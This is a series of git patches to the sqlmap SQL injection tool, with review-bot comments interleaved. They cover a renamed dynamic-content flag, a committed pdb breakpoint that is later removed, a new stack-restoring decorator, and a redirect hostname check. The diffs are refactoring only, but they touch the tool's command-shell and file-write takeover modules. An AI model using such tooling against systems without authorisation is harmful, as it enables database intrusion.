Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Sat, 31 Mar 2018 11:02:48 +0200 Subject: [PATCH 099/428] One more commit related to the last one (reduce false hopes in heavily dynamic cases) --- lib/controller/checks.py | 13 ++++++++++--- lib/core/option.py | 2 +- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 2 +- txt/checksum.md5 | 8 ++++---- 5 files changed, 17 insertions(+), 10 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 925804a26f2..671d023421b 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -508,14 +508,14 @@ def genCmpPayload(): errorResult = Request.queryPage(errorPayload, place, raise404=False) if errorResult: continue - elif not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)): + elif kb.heuristicPage and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)): _ = comparison(kb.heuristicPage, None, getRatioValue=True) if _ > kb.matchRatio: kb.matchRatio = _ logger.debug("adjusting match ratio for current parameter to %.3f" % kb.matchRatio) # Reducing false-positive "appears" messages in heavily dynamic environment - if kb.heavyDynamic and not Request.queryPage(reqPayload, place, raise404=False): + if kb.heavilyDynamic and not Request.queryPage(reqPayload, place, raise404=False): continue injectable = True @@ -986,6 +986,11 @@ def heuristicCheckSqlInjection(place, parameter): logger.debug(debugMsg) return None + if kb.heavilyDynamic: + debugMsg = "heuristic check skipped because of heavy dynamicity" + logger.debug(debugMsg) + return None + origValue = conf.paramDict[place][parameter] paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place 
@@ -1048,6 +1053,8 @@ def _(page): kb.ignoreCasted = readInput(message, default='Y' if conf.multipleTargets else 'N', boolean=True) elif result: + import pdb + pdb.set_trace() infoMsg += "be injectable" if Backend.getErrorParsedDBMSes(): infoMsg += " (possible DBMS: '%s')" % Format.getErrorParsedDBMSes() @@ -1172,7 +1179,7 @@ def checkDynamicContent(firstPage, secondPage): warnMsg += "sqlmap is going to retry the request(s)" singleTimeLogMessage(warnMsg, logging.CRITICAL) - kb.heavyDynamic = True + kb.heavilyDynamic = True secondPage, _, _ = Request.queryPage(content=True) findDynamicContent(firstPage, secondPage) diff --git a/lib/core/option.py b/lib/core/option.py index 7ab02a7f675..f7f213c9815 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1945,7 +1945,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.forcePartialUnion = False kb.forceWhere = None kb.futileUnion = None - kb.heavyDynamic = False + kb.heavilyDynamic = False kb.headersFp = {} kb.heuristicDbms = None kb.heuristicExtendedDbms = None diff --git a/lib/core/settings.py b/lib/core/settings.py index a3e399806e6..9e6da36b275 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.50" +VERSION = "1.2.3.51" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index 9c6ca87267c..0e692bbbc1d 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py 
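Review bot: The `import pdb` / `pdb.set_trace()` added in the `elif result:` branch of heuristicCheckSqlInjection is a live debugger breakpoint: every run that reaches a positive heuristic result stops and waits on stdin, which hangs non-interactive use (e.g. through sqlmapapi.py), and the updated txt/checksum.md5 in this commit records that file state as valid for version 1.2.3.51. Remove both lines; if an interactive stop is wanted during development, keep it behind an explicit opt-in (an environment variable check, for instance) rather than in the committed branch. Commit 100 (L320) removes them again. The enclosing function starts outside the hunk.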
@@ -54,7 +54,7 @@ def _orderByTest(cols): query = agent.suffixQuery(query, suffix=suffix, comment=comment) payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) - return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and not kb.heavyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None + return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and not kb.heavilyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1): infoMsg = "'ORDER BY' technique appears to be usable. " diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 4a24291ae54..03722f61fc5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -28c80dd4b8f288f46388770415d7c1df lib/controller/checks.py +71a8af96273cde7fd8e8c8b3122df27a lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 
@@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -8484e95c616b7a5220157c13e24fa1d6 lib/core/option.py +b950c8c2f2ae87ad2ec99e1d19b2c03a lib/core/option.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -30cc59cf0722d37effce632dcd38dc62 lib/core/settings.py +05c1496418a91fba529536205a7e9cc0 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -96,7 +96,7 @@ fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -07882f244fc73e130ab1a17caa6f5fb0 lib/techniques/union/test.py +36c49359a110fe0f797b2eb9e2d694ed lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py c552f8d924d962a26f2ded250bcea3b8 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py From 2cc6214227f233856be6b09715b43f823ea42210 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 1 Apr 2018 11:25:51 +0200 Subject: [PATCH 100/428] Fixes #3020 --- lib/controller/checks.py | 2 -- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 5 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 671d023421b..a665409954a 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py 
@@ -1053,8 +1053,6 @@ def _(page): kb.ignoreCasted = readInput(message, default='Y' if conf.multipleTargets else 'N', boolean=True) elif result: - import pdb - pdb.set_trace() infoMsg += "be injectable" if Backend.getErrorParsedDBMSes(): infoMsg += " (possible DBMS: '%s')" % Format.getErrorParsedDBMSes() diff --git a/lib/core/settings.py b/lib/core/settings.py index 9e6da36b275..b238cf13ed1 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.51" +VERSION = "1.2.4.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 03722f61fc5..27fe9b461ac 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -71a8af96273cde7fd8e8c8b3122df27a lib/controller/checks.py +8901cbab8f3885c554fe9ac43a1e5f14 lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -05c1496418a91fba529536205a7e9cc0 lib/core/settings.py +88d4f1d18b6919f1ad5f179ed959e7a7 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From 4147f44e6359ac0ecd42a4aea79a4016d5617eee Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 1 Apr 2018 12:45:47 +0200 Subject: [PATCH 101/428] Potential patch for Issues like #3013 and #3017 --- lib/controller/checks.py | 8 ++++++++ lib/controller/controller.py | 2 ++ lib/core/decorators.py | 17 +++++++++++++++++ lib/core/settings.py | 2 +- lib/request/connect.py | 2 ++ lib/request/inject.py | 2 ++ lib/takeover/xp_cmdshell.py | 2 ++ lib/techniques/union/test.py | 2 ++ lib/utils/search.py | 2 ++ plugins/dbms/mysql/filesystem.py | 2 ++ plugins/generic/databases.py | 2 ++ txt/checksum.md5 | 22 +++++++++++----------- 12 files changed, 53 insertions(+), 12 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index a665409954a..2de2bca42b5 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -54,6 +54,7 @@ from lib.core.datatype import AttribDict from lib.core.datatype import InjectionDict from lib.core.decorators import cachedmethod +from lib.core.decorators import stackedmethod from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import DBMS from lib.core.enums import HASHDB_KEYS @@ -832,6 +833,7 @@ def genCmpPayload(): return injection +@stackedmethod def heuristicCheckDbms(injection): """ This functions is called when boolean-based blind is identified with a 
@@ -868,6 +870,7 @@ def heuristicCheckDbms(injection): return retVal +@stackedmethod def checkFalsePositives(injection): """ Checks for false positives (only in single special cases) @@ -929,6 +932,7 @@ def _(): return retVal +@stackedmethod def checkSuhosinPatch(injection): """ Checks for existence of Suhosin-patch (and alike) protection mechanism(s) @@ -952,6 +956,7 @@ def checkSuhosinPatch(injection): kb.injection = popValue() +@stackedmethod def checkFilteredChars(injection): debugMsg = "checking for filtered characters" logger.debug(debugMsg) @@ -1314,6 +1319,7 @@ def checkRegexp(): return True +@stackedmethod def checkWaf(): """ Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse @@ -1379,6 +1385,7 @@ def checkWaf(): return retVal +@stackedmethod def identifyWaf(): if not conf.identifyWaf: return None @@ -1463,6 +1470,7 @@ def _(*args, **kwargs): return retVal +@stackedmethod def checkNullConnection(): """ Reference: http://www.wisec.it/sectou.php?id=472f952d79293 diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 9c3239d03fe..ad12620c7e7 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -43,6 +43,7 @@ from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.decorators import stackedmethod from lib.core.enums import CONTENT_TYPE from lib.core.enums import HASHDB_KEYS from lib.core.enums import HEURISTIC_TEST @@ -253,6 +254,7 @@ def _saveToResultsFile(): conf.resultsFP.flush() +@stackedmethod def start(): """ This function calls a function that performs checks on both URL diff --git a/lib/core/decorators.py b/lib/core/decorators.py index c4040f26720..94d0925c1d0 100644 --- a/lib/core/decorators.py +++ b/lib/core/decorators.py @@ -7,6 +7,8 @@ import hashlib +from lib.core.threads import getCurrentThreadData + def cachedmethod(f, cache={}): """ Method with a cached content 
@@ -22,3 +24,18 @@ def _(*args, **kwargs): return cache[key] return _ + +def stackedmethod(f): + def _(*args, **kwargs): + threadData = getCurrentThreadData() + originalLevel = len(threadData.valueStack) + + try: + result = f(*args, **kwargs) + finally: + if len(threadData.valueStack) > originalLevel: + threadData.valueStack = threadData.valueStack[:originalLevel] + + return result + + return _ \ No newline at end of file diff --git a/lib/core/settings.py b/lib/core/settings.py index b238cf13ed1..2ded395839b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.0" +VERSION = "1.2.4.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index dc2714bf2ce..0c130916af1 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -63,6 +63,7 @@ class WebSocketException(Exception): from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.decorators import stackedmethod from lib.core.dicts import POST_HINT_CONTENT_TYPES from lib.core.enums import ADJUST_TIME_DELAY from lib.core.enums import AUTH_TYPE @@ -768,6 +769,7 @@ class _(dict): return page, responseHeaders, code @staticmethod + @stackedmethod def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target URL page content diff --git a/lib/request/inject.py b/lib/request/inject.py index 35b0ad91057..cfe69a6ba50 100644 --- a/lib/request/inject.py 
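Review bot: `stackedmethod` returns a bare wrapper `_`, so every function it decorates in this patch (heuristicCheckDbms, checkWaf, queryPage, getValue, search and the rest) loses its `__name__` and docstring, which shows in tracebacks and profiling output; add `import functools` next to `import hashlib` and put `@functools.wraps(f)` on the inner `_`. The rollback in `finally` silently discards whatever was left on `threadData.valueStack`; since an unbalanced push/pop is presumably the condition this guards against, a debug message at that point (if a logger is available in this module), e.g. `logger.debug("discarding %d stale value(s) from thread value stack" % (len(threadData.valueStack) - originalLevel))`, would make the root cause findable instead of masked. The new file also ends without a trailing newline.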
+++ b/lib/request/inject.py @@ -33,6 +33,7 @@ from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries +from lib.core.decorators import stackedmethod from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS @@ -333,6 +334,7 @@ def _goUnion(expression, unpack=True, dump=False): return output +@stackedmethod def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True): """ Called each time sqlmap inject a SQL query on the SQL injection diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py index bb99a7dc7e7..19b06d8e80f 100644 --- a/lib/takeover/xp_cmdshell.py +++ b/lib/takeover/xp_cmdshell.py @@ -24,6 +24,7 @@ from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.decorators import stackedmethod from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import EXPECTED @@ -96,6 +97,7 @@ def _xpCmdshellCheck(self): return wasLastResponseDelayed() + @stackedmethod def _xpCmdshellTest(self): threadData = getCurrentThreadData() pushValue(threadData.disableStdOut) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index 0e692bbbc1d..7a63bc37f1f 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -27,6 +27,7 @@ from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.decorators import stackedmethod from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import PAYLOAD from lib.core.settings import LIMITED_ROWS_TEST_NUMBER 
@@ -48,6 +49,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where= """ retVal = None + @stackedmethod def _orderByTechnique(lowerCount, upperCount): def _orderByTest(cols): query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix) diff --git a/lib/utils/search.py b/lib/utils/search.py index 0d6e770b702..8c49b534e51 100644 --- a/lib/utils/search.py +++ b/lib/utils/search.py @@ -20,6 +20,7 @@ from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.decorators import stackedmethod from lib.core.enums import CUSTOM_LOGGING from lib.core.enums import HTTP_HEADER from lib.core.enums import REDIRECTION @@ -165,6 +166,7 @@ def _search(dork): return retVal +@stackedmethod def search(dork): pushValue(kb.redirectChoice) kb.redirectChoice = REDIRECTION.YES diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py index d28d1231283..1181d3a8664 100644 --- a/plugins/dbms/mysql/filesystem.py +++ b/plugins/dbms/mysql/filesystem.py @@ -14,6 +14,7 @@ from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.decorators import stackedmethod from lib.core.enums import CHARSET_TYPE from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD @@ -81,6 +82,7 @@ def stackedReadFile(self, rFile): return result + @stackedmethod def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False): logger.debug("encoding file to its hexadecimal string value") diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 75a9c704c58..b17ff722a63 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -32,6 +32,7 @@ from lib.core.data import logger from lib.core.data import paths from lib.core.data import queries +from lib.core.decorators import stackedmethod from lib.core.dicts import FIREBIRD_TYPES from lib.core.dicts import INFORMIX_TYPES from lib.core.enums import CHARSET_TYPE 
@@ -806,6 +807,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod return kb.data.cachedColumns + @stackedmethod def getSchema(self): infoMsg = "enumerating database management system schema" logger.info(infoMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 27fe9b461ac..c4011e71438 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,8 +21,8 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -8901cbab8f3885c554fe9ac43a1e5f14 lib/controller/checks.py -33689bb1b064d4eebc216934795a595f lib/controller/controller.py +84c8694d4ecacd843b6d745f032ff41f lib/controller/checks.py +c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py @@ -31,7 +31,7 @@ fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py -12e80071013606f01822c3823fb51054 lib/core/decorators.py +04638422b6ad1613238a9abf4fdf6491 lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py da98f5288aad57855c6d287ba3b397a1 lib/core/dicts.py 9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py 
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-88d4f1d18b6919f1ad5f179ed959e7a7 lib/core/settings.py
+f0f522f95a11b24bec01d42a9a535e23 lib/core/settings.py
 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py
@@ -68,12 +68,12 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py
 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py
 7e8e0a3fdebbe443832c1bab2f8d3869 lib/request/basic.py
 c0cabedead14b8a23353b606672cff42 lib/request/comparison.py
-a42707d6e89312659d3bdc8fb4ad1336 lib/request/connect.py
+acc31fac4efc25741c061bf8d7f8c3a2 lib/request/connect.py
 dd4598675027fae99f2e2475b05986da lib/request/direct.py
 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py
 eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py
 1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py
-cb05d965aa3d5871d14b5e45fe9128b4 lib/request/inject.py
+b188a11542a996276abbbc48913501c3 lib/request/inject.py
 aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py
 51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py
 aa7cb67139bbc57d67a728fd2abf80ed lib/request/rangehandler.py
@@ -86,7 +86,7 @@ b1a6689e92e6ce998337bd41d8b09d6e lib/takeover/metasploit.py
 fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py
 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py
 4584ac6ee5c13d4d395f0a7a21d8478c lib/takeover/web.py
-79d1ba3ab7b2552c5f09992ce08e765d lib/takeover/xp_cmdshell.py
+f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py
 2543e14cc7f6e239b49dd40f41bc34fa lib/techniques/blind/inference.py
 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py
 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py
@@ -96,7 +96,7 @@ fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py
 f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py
 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py
 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py
-36c49359a110fe0f797b2eb9e2d694ed lib/techniques/union/test.py
+cbe59feb11526068bbbd35dca97b3b37 lib/techniques/union/test.py
 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py
 c552f8d924d962a26f2ded250bcea3b8 lib/utils/api.py
 37dfb641358669f62c2acedff241348b lib/utils/brute.py
@@ -111,7 +111,7 @@ cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py
 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py
 5cb78b0e60fd7fd84502d62cf85d2064 lib/utils/progress.py
 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py
-fb6cf3415fbbf117e2dc87aae2f35993 lib/utils/search.py
+2e3e7213f50b52fc4d5a014a2ff8d163 lib/utils/search.py
 236a8d9e596602b53f8e0aa09c30c0ef lib/utils/sqlalchemy.py
 dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py
 3d230e342a6c8d60ac7c68c556fbba9b lib/utils/versioncheck.py
@@ -168,7 +168,7 @@ affef90b1442285da7e89e46603c502e plugins/dbms/mssqlserver/__init__.py
 08fe8ac7acdfc0e3168b5b069a7c73bf plugins/dbms/mssqlserver/takeover.py
 f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py
 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py
-f36e09edc3eafedd989fbe44ec048e71 plugins/dbms/mysql/filesystem.py
+4578fa29f04d0a75499f9668466ded07 plugins/dbms/mysql/filesystem.py
 fcbf7ff279c527b4aca0dac94c28d20c plugins/dbms/mysql/fingerprint.py
 30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py
 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py
@@ -203,7 +203,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py -dc07665887191ac977e5377f5a66d288 plugins/generic/databases.py +79c6dbcb7e6ad5e993a44aa52fdc36ed plugins/generic/databases.py a9c8637f0526d751cd1a6a18f91967f5 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py From 7f3f1dcdeed9729af14fd8339be7781607c5e472 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 3 Apr 2018 12:50:09 +0200 Subject: [PATCH 102/428] Fixes #3022 --- lib/controller/checks.py | 3 ++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 2de2bca42b5..7b2a97fa3b3 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -47,6 +47,7 @@ from lib.core.common import urlencode from lib.core.common import wasLastResponseDBMSError from lib.core.common import wasLastResponseHTTPError +from lib.core.convert import unicodeencode from lib.core.defaults import defaults from lib.core.data import conf from lib.core.data import kb 
@@ -1562,7 +1563,7 @@ def checkConnection(suppressOutput=False): threadData = getCurrentThreadData() if kb.redirectChoice == REDIRECTION.YES and threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID: - if conf.hostname in (threadData.lastRedirectURL[1] or "") and threadData.lastRedirectURL[1].startswith("https://"): + if (threadData.lastRedirectURL[1] or "").startswith("https://") and unicodeencode(conf.hostname) in threadData.lastRedirectURL[1]: conf.url = re.sub(r"https?://", "https://", conf.url) match = re.search(r":(\d+)", threadData.lastRedirectURL[1]) port = match.group(1) if match else 443 diff --git a/lib/core/settings.py b/lib/core/settings.py index 2ded395839b..af23c3b9fce 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.1" +VERSION = "1.2.4.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c4011e71438..52f65a8fe73 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -84c8694d4ecacd843b6d745f032ff41f lib/controller/checks.py +5084b16b037ed8d29f594f6113fe78e3 lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 
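Review bot: The rewritten condition still tests the hostname as a substring (`unicodeencode(conf.hostname) in threadData.lastRedirectURL[1]`), so a redirect to a different host whose URL merely contains the original hostname (in a subdomain label, the path or the query string) passes the check, after which `conf.url` is switched to HTTPS and the port is taken from that foreign URL; likewise `re.search(r":(\d+)", ...)` on the following line picks the first `:digits` anywhere in the URL, not only in the authority part. Parse the redirect target once and compare components, using the stdlib `urlparse` or whatever URL parser checks.py already imports: `parsed = urlparse.urlparse(threadData.lastRedirectURL[1] or "")`, `if parsed.scheme == "https" and parsed.hostname == conf.hostname:`, `port = parsed.port or 443`. If the encoded form is needed for the comparison, apply `unicodeencode` to `parsed.hostname` rather than testing containment. The body of `checkConnection` starts before and continues after the hunk.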
